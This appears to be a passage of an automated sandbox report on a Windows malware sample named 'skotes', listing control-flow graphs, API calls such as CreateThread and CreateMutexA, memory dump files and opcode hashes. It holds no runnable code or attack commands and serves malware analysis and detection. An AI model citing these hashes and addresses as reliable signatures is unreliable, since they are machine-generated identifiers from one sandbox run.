                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __dosmaperr$File$CreateType
                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                          • API String ID: 3443242726-2852464175
                                                                                                                                                                                                                                          • Opcode ID: c20cad5f1503f9510ec0b1093071013d19293501757bc18c61747f4712249cc9
                                                                                                                                                                                                                                          • Instruction ID: 6286686ec06af509815a6dae57e24b1da1f3c6e82b601fab546297ad4817a802
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c20cad5f1503f9510ec0b1093071013d19293501757bc18c61747f4712249cc9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3A10432A081488FCF19DF6CCCA1BFE7BE1EB17320F144599E811AF291EAB59912C751

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2265 b77590-b775e1 Sleep 2266 b775e3-b775f7 call b8d111 2265->2266 2267 b77661-b776d7 call b880c0 * 3 CreateThread Sleep 2265->2267 2266->2267 2272 b775f9-b7765e call b8d64e call b8d0c7 2266->2272 2280 b77705-b7771d 2267->2280 2281 b776d9-b776e5 2267->2281 2272->2267 2285 b77747-b7775f 2280->2285 2286 b7771f-b7772b 2280->2286 2283 b776e7-b776f5 2281->2283 2284 b776fb-b77702 call b8d663 2281->2284 2283->2284 2287 b7779b-b777a0 call ba6c6a 2283->2287 2284->2280 2291 b77761-b7776d 2285->2291 2292 b77789-b7779a 2285->2292 2289 b7773d-b77744 call b8d663 2286->2289 2290 b7772d-b7773b 2286->2290 2289->2285 2290->2287 2290->2289 2296 b7777f-b77786 call b8d663 2291->2296 2297 b7776f-b7777d 2291->2297 2296->2292 2297->2287 2297->2296
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,EB1D7F10,?,00000000,00BB9138,000000FF), ref: 00B775CC
                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00B77430,00BD8638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00B776BE
                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B776C9
                                                                                                                                                                                                                                            • Part of subcall function 00B8D0C7: RtlWakeAllConditionVariable.NTDLL ref: 00B8D17B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Sleep$ConditionCreateThreadVariableWake
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 79123409-0
                                                                                                                                                                                                                                          • Opcode ID: 07e386fb91bd3c9862b07b91d18239b4fa27c89dc17683d59efbedc1fc24fe21
                                                                                                                                                                                                                                          • Instruction ID: 41bd869fb79790edfe09987dfa208ead6c74b1cb3603282ab7ed8e025c5fe075
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07e386fb91bd3c9862b07b91d18239b4fa27c89dc17683d59efbedc1fc24fe21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31511470241248ABEB18DF28DC95F8C7BE1EB05315F50869AF819973E1EF75D880CB91

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2302 ba6fb4-ba6fe9 GetFileType 2303 ba6fef-ba6ffa 2302->2303 2304 ba70a1-ba70a4 2302->2304 2305 ba701c-ba7038 call ba40f0 GetFileInformationByHandle 2303->2305 2306 ba6ffc-ba700d call ba732a 2303->2306 2307 ba70cd-ba70f5 2304->2307 2308 ba70a6-ba70a9 2304->2308 2317 ba70be-ba70cb call ba75c0 2305->2317 2323 ba703e-ba7080 call ba727c call ba7124 * 3 2305->2323 2320 ba70ba-ba70bc 2306->2320 2321 ba7013-ba701a 2306->2321 2309 ba7112-ba7114 2307->2309 2310 ba70f7-ba710a 2307->2310 2308->2307 2313 ba70ab-ba70ad 2308->2313 2315 ba7115-ba7123 call b8cff1 2309->2315 2310->2309 2325 ba710c-ba710f 2310->2325 2313->2317 2318 ba70af-ba70b4 call ba75f6 2313->2318 2317->2320 2318->2320 2320->2315 2321->2305 2338 ba7085-ba709d call ba7249 2323->2338 2325->2309 2338->2309 2341 ba709f 2338->2341 2341->2320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00BA6EE6), ref: 00BA6FD6
                                                                                                                                                                                                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 00BA7030
                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00BA70C5
                                                                                                                                                                                                                                            • Part of subcall function 00BA732A: __dosmaperr.LIBCMT ref: 00BA735F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File__dosmaperr$HandleInformationType
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2531987475-0
                                                                                                                                                                                                                                          • Opcode ID: d8535d402419c511e7fdeaa0eb0dfe9d8ceef168d0521b351fa96b1ccc2f79a7
                                                                                                                                                                                                                                          • Instruction ID: a15b66abc5c7e64cf33d58ebe1cfd6159e88c3c0caf9d0d9a49faea73c33fa9f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8535d402419c511e7fdeaa0eb0dfe9d8ceef168d0521b351fa96b1ccc2f79a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8416E7194C204ABDB24EFB5DC419AFB7F9EF8A300B10496EF956E3210EB309944CB61

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2342 b79ba5-b79bc5 GetFileAttributesA 2345 b79bc7-b79bd3 2342->2345 2346 b79bf3-b79c0f 2342->2346 2347 b79bd5-b79be3 2345->2347 2348 b79be9-b79bf0 call b8d663 2345->2348 2349 b79c11-b79c1d 2346->2349 2350 b79c3d-b79c5c 2346->2350 2347->2348 2355 b7a91c 2347->2355 2348->2346 2351 b79c33-b79c3a call b8d663 2349->2351 2352 b79c1f-b79c2d 2349->2352 2353 b79c5e-b79c6a 2350->2353 2354 b79c8a-b7a916 call b880c0 2350->2354 2351->2350 2352->2351 2352->2355 2358 b79c80-b79c87 call b8d663 2353->2358 2359 b79c6c-b79c7a 2353->2359 2361 b7a953-b7a987 Sleep CreateMutexA 2355->2361 2362 b7a91c call ba6c6a 2355->2362 2358->2354 2359->2355 2359->2358 2370 b7a98e-b7a994 2361->2370 2362->2361 2372 b7a9a7-b7a9a8 2370->2372 2373 b7a996-b7a998 2370->2373 2373->2372 2374 b7a99a-b7a9a5 2373->2374 2374->2372 2376 b7a9a9-b7a9b0 call ba6629 2374->2376
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00B79BA8
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 396266464-0
                                                                                                                                                                                                                                          • Opcode ID: 6b063ddb600862af2d5b07002b5bb5a97e7d2b6c5d6e5f34bcb20c894a41fd66
                                                                                                                                                                                                                                          • Instruction ID: 125b7b1df13df3d52852b2e93ef5cfda93f8245242429e99d2d17d906d33a3f1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b063ddb600862af2d5b07002b5bb5a97e7d2b6c5d6e5f34bcb20c894a41fd66
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1314A316042049BEB08EB7CDC89B6DBBE2DBC6310F24C699E068D73D6D7759980C752

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2379 b79cda-b79cfa GetFileAttributesA 2382 b79cfc-b79d08 2379->2382 2383 b79d28-b79d44 2379->2383 2386 b79d1e-b79d25 call b8d663 2382->2386 2387 b79d0a-b79d18 2382->2387 2384 b79d46-b79d52 2383->2384 2385 b79d72-b79d91 2383->2385 2389 b79d54-b79d62 2384->2389 2390 b79d68-b79d6f call b8d663 2384->2390 2391 b79d93-b79d9f 2385->2391 2392 b79dbf-b7a916 call b880c0 2385->2392 2386->2383 2387->2386 2393 b7a921 2387->2393 2389->2390 2389->2393 2390->2385 2398 b79db5-b79dbc call b8d663 2391->2398 2399 b79da1-b79daf 2391->2399 2395 b7a953-b7a987 Sleep CreateMutexA 2393->2395 2396 b7a921 call ba6c6a 2393->2396 2407 b7a98e-b7a994 2395->2407 2396->2395 2398->2392 2399->2393 2399->2398 2409 b7a9a7-b7a9a8 2407->2409 2410 b7a996-b7a998 2407->2410 2410->2409 2411 b7a99a-b7a9a5 2410->2411 2411->2409 2413 b7a9a9-b7a9b0 call ba6629 2411->2413
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00B79CDD
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00BD3254), ref: 00B7A981
